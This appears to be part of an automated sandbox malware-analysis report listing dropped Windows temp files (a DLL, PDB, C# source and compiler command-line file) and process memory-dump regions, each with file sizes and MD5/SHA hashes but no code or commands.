0c4d214ab596402e3826bde1cb370f04b4c74fb8

SHA256
51efd690da189a44f9160d46fea5a08423f3e84a2816b5f17f4e9385d652fb03

SHA512
6fa0398e291ad5bf676656f99c9975cbc78d0ba56ab95d69935b03cc26584fa4b8f44c3c501354859861d7d0c75b053200620a95c582fd2bad2e9dcd9ec03825

Download Submit
C:\Users\Admin\AppData\Local\Temp\wekta6vy.dll

Filesize
3KB

MD5
6bfba49c4a4c623265c8c7d250fa06f0

SHA1
cc1eeb99a259ff23e50d7d3132186d1f88333d02

SHA256
277f15a35c815328ddf1a2e02c965daf6ab02d5d0bbd2e441ca781cc0f8294d1

SHA512
bf70efd0da96b9013c5de44668ec4dbbc496f2d89c278cb5e3a571cae90467e225d7aa3adc609e768769729f0e9ec7a6e24644565fe30799821b1addd6215dde

Download Submit
C:\Users\Admin\AppData\Local\Temp\wekta6vy.pdb

Filesize
7KB

MD5
47d2b499ab614e7e3492e0514fd7aea3

SHA1
dafa5b3bfeca7f0a94600782e59f4cda8a4e8cc9

SHA256
55f18ae3a2322925984a491c953408efefe5817cad6bbb6dd7d777559beff0e7

SHA512
9e30677120140b5358f93b83f218f6d3df450282d0a0f1d8985e563d8b451fa99970ffe2b57e39d3a2769a31b3d88ff6a1858203f526e2d7e6ba93533942e29e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4L8SFV861HBEX383C2AC.temp

Filesize
7KB

MD5
38d68a3fcf423f3d394f5ecb5e75cf14

SHA1
b08701871bcae0ab59655fd4f1a1372aee3a3147

SHA256
3ec9a70feeb4b802dbe1341ebe881f45c5ff81051329cbc67fbf8bd7390a38a9

SHA512
b8867ce222490e10c75e22225a606f59a89ff84431cf02caac8df909f1cee1ca51d591f5e56578d35d44467046334a6d3349026d7ca3083f7094656070d93503

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
38d68a3fcf423f3d394f5ecb5e75cf14

SHA1
b08701871bcae0ab59655fd4f1a1372aee3a3147

SHA256
3ec9a70feeb4b802dbe1341ebe881f45c5ff81051329cbc67fbf8bd7390a38a9

SHA512
b8867ce222490e10c75e22225a606f59a89ff84431cf02caac8df909f1cee1ca51d591f5e56578d35d44467046334a6d3349026d7ca3083f7094656070d93503

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA544.tmp

Filesize
652B

MD5
f804b5b974212a31c7885e54e17f1463

SHA1
bbf8ca8b84b7cda7ddd6345e139b09915c973ad3

SHA256
94c3b2f24d2d0620efe79b1d34beb3ed738f0d4ccd8f44dcc84c36650f4918ef

SHA512
82d9f268306becc9cf50f20c7666b80e69fd31acdb23553426f281900f351b676193380c3ec8585dfa8481136cd762fa8202c22d82ff6e00d2106259e24f249d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wekta6vy.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wekta6vy.cmdline

Filesize
309B

MD5
7c67203149f98ddf8a6a9c192fef3343

SHA1
592631e07c961a08ccf4ed4eb46af280b2f4fc26

SHA256
024faed2a6d163fd9dbab1045fe8ad34d1731f8ab8e0a6d3749daedc5f4266bf

SHA512
4dedafcf7a98f206a5e2a8930315a3cb8c243a8511415462ec5701026eef68e9e03dcd246240d9495bee45cd6bf1e23bda79f961608356de8b8734f648393e34

Download Submit
memory/572-73-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/572-104-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

Filesize
9.6MB

Download
memory/572-70-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

Filesize
9.6MB

Download
memory/572-71-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

Filesize
9.6MB

Download
memory/572-72-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/572-122-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/572-74-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/572-116-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/572-115-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/572-107-0x0000000002AA0000-0x0000000002B20000-memory.dmp

Filesize
512KB

Download
memory/1252-62-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1252-63-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1252-64-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

Filesize
9.6MB

Download
memory/1252-86-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

Filesize
9.6MB

Download
memory/1252-87-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1252-88-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1252-89-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1252-90-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1252-60-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1252-61-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1252-59-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

Filesize
9.6MB

Download
memory/1252-58-0x00000000022F0000-0x00000000022F8000-memory.dmp

Filesize
32KB

Download
memory/1252-57-0x000000001B280000-0x000000001B562000-memory.dmp

Filesize
2.9MB

Download
memory/2948-111-0x0000000004FD0000-0x0000000005001000-memory.dmp

Filesize
196KB

Download
memory/2948-101-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/2948-80-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/2948-105-0x0000000004FD0000-0x0000000005001000-memory.dmp

Filesize
196KB

Download
memory/2948-79-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/2948-109-0x0000000004FA0000-0x0000000004FCB000-memory.dmp

Filesize
172KB

Download
memory/2948-102-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/2948-112-0x0000000004FD0000-0x0000000005001000-memory.dmp

Filesize
196KB

Download
memory/2948-78-0x0000000072DA0000-0x000000007334B000-memory.dmp

Filesize
5.7MB

Download
memory/2948-77-0x0000000072DA0000-0x000000007334B000-memory.dmp

Filesize
5.7MB

Download
memory/2948-117-0x0000000072DA0000-0x000000007334B000-memory.dmp

Filesize
5.7MB

Download
memory/2948-157-0x00000000025A0000-0x00000000026A0000-memory.dmp

Filesize
1024KB

Download
memory/2948-124-0x0000000005EB0000-0x00000000060B0000-memory.dmp

Filesize
2.0MB

Download
memory/2948-123-0x00000000050B0000-0x0000000005111000-memory.dmp

Filesize
388KB

Download
memory/2948-129-0x0000000004FD0000-0x0000000005001000-memory.dmp

Filesize
196KB

Download
memory/2948-135-0x0000000072DA0000-0x000000007334B000-memory.dmp

Filesize
5.7MB

Download
memory/2948-136-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/2948-137-0x00000000026A0000-0x00000000026E0000-memory.dmp

Filesize
256KB

Download
memory/2948-148-0x00000000025A0000-0x00000000026A0000-memory.dmp

Filesize
1024KB

Download
memory/2948-147-0x00000000051A0000-0x00000000051C4000-memory.dmp

Filesize
144KB

Download
memory/2948-153-0x0000000004FD0000-0x0000000005001000-memory.dmp

Filesize
196KB

Download
memory/2948-155-0x0000000004FA0000-0x0000000004FCB000-memory.dmp

Filesize
172KB

Download
memory/2948-156-0x0000000005EB0000-0x00000000060B0000-memory.dmp

Filesize
2.0MB

Download
memory/2972-103-0x000000013F350000-0x000000013F371000-memory.dmp

Filesize
132KB

Download